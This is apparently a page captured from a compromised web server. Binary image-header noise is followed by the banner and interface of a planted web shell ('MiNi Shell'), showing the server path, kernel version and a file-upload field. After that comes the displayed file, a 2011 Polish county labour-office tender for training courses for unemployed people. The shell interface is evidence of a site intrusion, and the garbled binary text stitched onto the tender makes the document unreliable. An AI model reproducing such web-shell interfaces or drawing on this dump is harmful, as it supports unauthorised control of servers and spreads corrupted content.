JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110317/87533-N-2011.html

<p class="kh_header"><b>Aleksandrów Kujawski: Organizacja i przeprowadzenie szkoleń dla osób bezrobotnych i poszukujących pracy:
Część A - szkolenie Kurs dokształcający kierowców przewożących materiały niebezpieczne ADR + cysterny,
Część B - Szkolenie okresowe kierowców w zakresie bloków programowych określonych odpowiednio do kategorii prawa jazdy: C1, C1+E, C i C+E,
Część C - szkolenie Urządzenia, instalacje i sieci elektroenergetyczne o napięciu do 1 kV- eksploatacja,
Część D - szkolenie Kurs obsługi żurawia przenośnego HDS z uprawnieniami UDT kat. IIŻ</b><br>
<b>Numer ogłoszenia: 87533 - 2011; data zamieszczenia: 17.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Przemysłowa 1, 87-700 Aleksandrów Kujawski, woj. kujawsko-pomorskie, tel. 054 2824696, faks 054 2824696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-aleksandrowkujawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń dla osób bezrobotnych i poszukujących pracy:
Część A - szkolenie Kurs dokształcający kierowców przewożących materiały niebezpieczne ADR + cysterny,
Część B - Szkolenie okresowe kierowców w zakresie bloków programowych określonych odpowiednio do kategorii prawa jazdy: C1, C1+E, C i C+E,
Część C - szkolenie Urządzenia, instalacje i sieci elektroenergetyczne o napięciu do 1 kV- eksploatacja,
Część D - szkolenie Kurs obsługi żurawia przenośnego HDS z uprawnieniami UDT kat. IIŻ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie przewiduje przeprowadzenie następujących szkoleń finansowanych w całości ze środków publicznych:

Część A
Szkolenie: Kurs dokształcający kierowców przewożących materiały niebezpieczne ADR + cysterny 
1) Szkolenie winno odbywać się w odległości nie większej niż 50km od miejscowości Aleksandrów Kujawski.
2) Szkoleniem objętych będzie 12 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków Funduszu Pracy. Rozpoczęcie szkolenia przewidziane jest w II kwartale bieżącego roku. 
3) Szkolenie winno zostać przeprowadzone zgodnie z aktualnymi, obowiązującymi regulacjami prawnymi dotyczącymi transportu materiałów niebezpiecznych, a szczególności zgodnie z rozporządzeniem Ministra Infrastruktury w sprawie kursów dokształcających dla kierowców przewożących towary niebezpieczne z dnia 15 września 2005r.( Dz. U. Nr 187, poz. 1571). Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 40 ( gdzie godzina zegarowa zajęć liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny).
4) W ramach szkolenia Wykonawca zobowiązany jest do:
                      - zapewnienia ośrodka szkoleniowego,
                      - zapewnienia materiałów szkoleniowych, w postaci  notatnika,  długopisu dla każdego uczestnika szkolenia,
	                  - wyposażenia sali do zajęć teoretycznych w materiały i urządzenia niezbędne do prawidłowego przebiegu procesu dydaktycznego,
                      - przedstawienia Zleceniodawcy szczegółowego harmonogramu zajęć,
                      - sprawowania nadzoru nad frekwencją uczestników szkolenia,
                      - prowadzenia dziennika zajęć,
                      - zakończenia szkolenia poprzez przeprowadzenie egzaminu końcowego i   wydanie stosownego dokumentu o ukończeniu szkolenia,
                      - przedłożenia Zleceniodawcy po zakończeniu szkolenia faktury i protokołu z egzaminu oraz rozliczenia godzin zrealizowanych na szkoleniu uwzględniającego dni, godziny oraz tematykę zrealizowanych zajęć,
                     - umożliwienia pracownikom PUP kontroli dokumentów w zakresie dotyczącym wykonywania zapisów niniejszej specyfikacji.
5) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 16:00, minimum 25 godzin zegarowych tygodniowo. Każda z osób w grupie winna zrealizować program o tej samej tematyce i takiej samej liczbie godzin szkolenia,
6) Opisane szkolenie jest szkoleniem zamkniętym, tzn. na szkolenie zostaną skierowane osoby tylko przez Zamawiającego t.j. Powiatowy Urząd Pracy w Aleksandrowie Kujawskim. 
7) Ogólny koszt szkolenia sporządzony przez Wykonawcę powinien uwzględniać m.in. koszt egzaminów, wynajem sali, materiały dydaktyczne, wynajem sprzętu, wynagrodzenie wykładowców oraz inne składowe.

Część B
Szkolenie okresowe kierowców w zakresie bloków programowych określonych odpowiednio do kategorii prawa jazdy: C1, C1+E, C i C+E
1) Szkolenie winno odbywać się w miejscowości Aleksandrów Kujawski.
2) Szkoleniem objętych będzie 20 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w dwóch grupach, skierowanych na szkolenie w ramach środków Funduszu Pracy. Rozpoczęcie szkolenia pierwszej grupy przewidziane jest w II kwartale bieżącego roku, zaś druga grupa rozpocznie szkolenie w III kwartale bieżącego roku. 
3) Szkolenie winno zostać przeprowadzone zgodnie z aktualnymi, obowiązującymi regulacjami prawnymi dotyczącymi transportu drogowego. Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 35 godzin. Łączny czas zajęć teoretycznych realizowanych w zakresie szkolenia okresowego w ciągu jednego dnia nie może przekroczyć 7 godzin. Przerwy pomiędzy poszczególnymi zajęciami nie mogą być dłuższe niż 15 minut. Całkowity wymiar szkolenia winien uwzględniać zarówno zajęcia teoretyczne w wymiarze 35 godzin jak i przerwy. Częstotliwość przerw może być ustalana w sposób elastyczny.
4) W ramach szkolenia Wykonawca zobowiązany jest do:
                      - zapewnienia ośrodka szkoleniowego (warunki  lokalowe  oraz   sprzętowe  zapewnione  przez   wykonawcę powinny  umożliwić  uczestnikom  kursu  korzystanie w  dostateczny sposób  z  przekazywanej  wiedzy teoretycznej  i  praktycznej),
                      - zapewnienia materiałów szkoleniowych, w postaci  notatnika, długopisu, dla  każdego uczestnika szkolenia,
	                  - wyposażenia sali do zajęć teoretycznych w materiały i urządzenia niezbędne do prawidłowego przebiegu procesu dydaktycznego,
                      - przedstawienia Zleceniodawcy szczegółowego harmonogramu zajęć,
                      - sprawowania nadzoru nad frekwencją uczestników szkolenia,
                      - prowadzenia dziennika zajęć,
                      - przedłożenia Zleceniodawcy po zakończeniu szkolenia faktury oraz rozliczenia godzin zrealizowanych na szkoleniu uwzględniającego dni, godziny oraz tematykę zrealizowanych zajęć,
                     - umożliwienia pracownikom PUP kontroli dokumentów w zakresie dotyczącym wykonywania zapisów niniejszej specyfikacji.
5) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 17:00, minimum 25 godzin zegarowych tygodniowo,
6) Opisane szkolenie jest szkoleniem zamkniętym, tzn. na szkolenie zostaną skierowane osoby tylko przez Zamawiającego t.j. Powiatowy Urząd Pracy w Aleksandrowie Kujawskim. 
7) Ogólny koszt szkolenia sporządzony przez Wykonawcę powinien uwzględniać m.in. wynajem sali, materiały dydaktyczne, wynajem sprzętu, wynagrodzenie wykładowców oraz inne składowe.
8) Szkolenia winno zakończyć się wydaniem stosownego świadectwa kwalifikacyjnego.

Część C 
Szkolenie Urządzenia, instalacje i sieci elektroenergetyczne o napięciu do 1 kV- eksploatacja
1)	Szkolenie winno odbywać się w miejscowości Aleksandrów Kujawski.
2)	Szkolenie winno zostać przeprowadzone zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci ( D.U. Nr 89 poz. 828 ze zm. ).
3) Szkoleniem objętych będzie 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie,   w ramach środków Funduszu Pracy.
4) Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 30 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny).
5)  Szkolenia winno zakończyć się egzaminem przed uprawnioną komisją i wydaniem stosownego świadectwa kwalifikacyjnego. 
6) Rozpoczęcie szkolenia przewidziane jest w II kwartale bieżącego roku,
7) W ramach szkolenia Wykonawca zobowiązany jest do:
                      - zapewnienia ośrodka szkoleniowego,
                          -zapewnienia materiałów szkoleniowych w postaci notatnika,  długopisu dla każdego uczestnika szkolenia,
                       - przedstawienia Zleceniodawcy szczegółowego harmonogramu zajęć,
                      - sprawowania nadzoru nad frekwencją uczestników szkolenia,
                      - prowadzenia dziennika zajęć,
                      - zakończenia szkolenia poprzez przeprowadzenie egzaminu końcowego i   wydanie stosownego dokumentu o ukończeniu szkolenia,
                      - przedłożenia Zleceniodawcy po zakończeniu szkolenia faktury i protokołu   z egzaminu oraz rozliczenia godzin zrealizowanych na szkoleniu uwzględniającego dni, godziny oraz tematykę zrealizowanych zajęć,
                     - umożliwienia pracownikom PUP kontroli dokumentów w zakresie dotyczącym wykonywania zapisów niniejszej specyfikacji,
8) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 16:00 minimum 25 godzin zegarowych tygodniowo. Każda z osób w grupie winna zrealizować program o tej samej tematyce i takiej samej liczbie godzin szkolenia,
10) Opisane szkolenie jest szkoleniem zamkniętym, tzn. na szkolenie zostaną skierowane osoby tylko przez Zamawiającego t.j. Powiatowy Urząd Pracy w Aleksandrowie Kujawskim. 
11) Ogólny koszt szkolenia sporządzony przez Wykonawcę powinien uwzględniać m.in. koszt egzaminów, wynajem sali, materiały dydaktyczne, wynajem sprzętu, wynagrodzenie wykładowców oraz inne składowe.
Część D 
Szkolenie: Kurs obsługi żurawia przenośnego HDS z uprawnieniami UDT kat. IIŻ

1)Szkolenie winno odbywać się w miejscowości Aleksandrów Kujawski.
2)Szkolenie winno zostać przeprowadzone zgodnie z rozporządzeniem Ministra Gospodarki  z 18 lipca 2001r. w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze  i konserwacji urządzeń technicznych ( D.U. Nr 79 poz. 849 ze zm. ).
3) Szkoleniem objętych będzie 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków Funduszu Pracy.
4)Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 35 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana   w sposób elastyczny).
5) Szkolenia winno zakończyć się egzaminem przed uprawnioną komisją i wydaniem stosownego świadectwa kwalifikacyjnego. 
6)   Rozpoczęcie szkolenia przewidziane jest w II kwartale bieżącego roku,
7)  W ramach szkolenia Wykonawca zobowiązany jest do:
                      - zapewnienia ośrodka szkoleniowego,
                       -zapewnienia materiałów szkoleniowych w postaci  notatnika,  długopisu dla każdego uczestnika szkolenia,
                       - przedstawienia Zleceniodawcy szczegółowego harmonogramu zajęć,
                    - sprawowania nadzoru nad frekwencją uczestników szkolenia,
                    - prowadzenia dziennika zajęć,
               - przeprowadzenie szkolenia zgodnie z programem zatwierdzonym przez  Urząd Dozoru Technicznego,
                     - zakończenia szkolenia poprzez przeprowadzenie egzaminu końcowego przed uprawnioną komisją i wydanie stosownego zaświadczenia o ukończeniu szkolenia,
                     - przedłożenia Zleceniodawcy po zakończeniu szkolenia faktury i protokołu z egzaminu oraz rozliczenia godzin zrealizowanych na szkoleniu uwzględniającego dni, godziny oraz tematykę zrealizowanych zajęć,
                     - umożliwienia pracownikom PUP kontroli dokumentów w zakresie dotyczącym wykonywania zapisów niniejszej specyfikacji,
8) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 16:00 minimum 25 godzin zegarowych tygodniowo. Każda z osób w grupie winna zrealizować program o tej samej tematyce i takiej samej liczbie godzin szkolenia,
9) Opisane szkolenie jest szkoleniem zamkniętym, tzn. na szkolenie zostaną skierowane osoby tylko przez Zamawiającego t.j. Powiatowy Urząd Pracy w Aleksandrowie Kujawskim. 
10) Ogólny koszt szkolenia sporządzony przez Wykonawcę powinien uwzględniać m.in. koszt egzaminów, wynajem sali, materiały dydaktyczne, wynajem sprzętu, wynagrodzenie wykładowców oraz inne składowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.12.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga aktualnego dokumentu potwierdzajacego uzyskanie wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej oraz oświadczeniem o aktualizacji wpisu na 2011 rok i aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oswiadczenia w zakresie art. 24 ust.1 pkt 2 ustawu prawo zamówien publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia. Wykonawcy nie spełniajacy warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że należycie zrealizowali co najmniej 2 usługi szkoleniowe o wskazanej tematyce, w okresie ostatnich trzech lat przed upływem terminu składania ofert dla każdego kursu o jaki Wykonawca się ubiega. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu oraz wykazu zrealizowanych szkoleń. Wykonawcy nie spełniający warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga złożenia oświadczenia w trybie art. 22 ust.1 ustawy Prawo zamówień publicznych Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu. Wykonawcy nie spełniający warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga złożenia oświadczenia w trybie art. 22 ust.1 ustawy Prawo zamówień publicznych oraz wykazania, że dysponuje osobami legitymującymi się doświadczeniem w realizacji co najmniej 1 szkolenia o podobnym zakresie tematycznym w stosunku do przedmiotowego szkolenia, zrealizowanych w przeciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności szkoleniowej danej osoby jest krótszy - w tym okresie ). Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu oraz na podstawie dokumentów załączonych do oferty oraz wykazu osób, które będą uczesniczyły w wykonaniu zamówienia, sporzadzonego wg wzoru na zał. nr 2 do SIWZ. Wykonawcy nie spełniający warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający na potwierdzenie spełniania tego warunku wymaga złożenia oświadczenia w trybie art. 22 ust.1 ustawy Prawo zamówień publicznych Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu. Wykonawcy nie spełniający warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 10</li>
<li>3 - Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Zamawiający zastrzega sobie możliwość zmiany umowy w zakresie liczby osób skierowanych na szkolenie ( w takim przypadku Zamawiający dokona zapłaty za liczbę osób faktycznie przeszkolonych), przesunięcia terminu realizacji szkolenia, uzasadnioną zmianę miejsca organizacji szkolenia, dokonanie zmiany wykładowcy po podpisaniu umowy, pod warunkiem, że nowo wskazany wykładowca będzie posiadał wykształcenie i doświadczenie w zakresie ilości przeprowadzonych szkoleń z zakresu objętego zamówieniem równoważne do zmienianego wykładowcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-aleksandrowkujawski.pl<br>
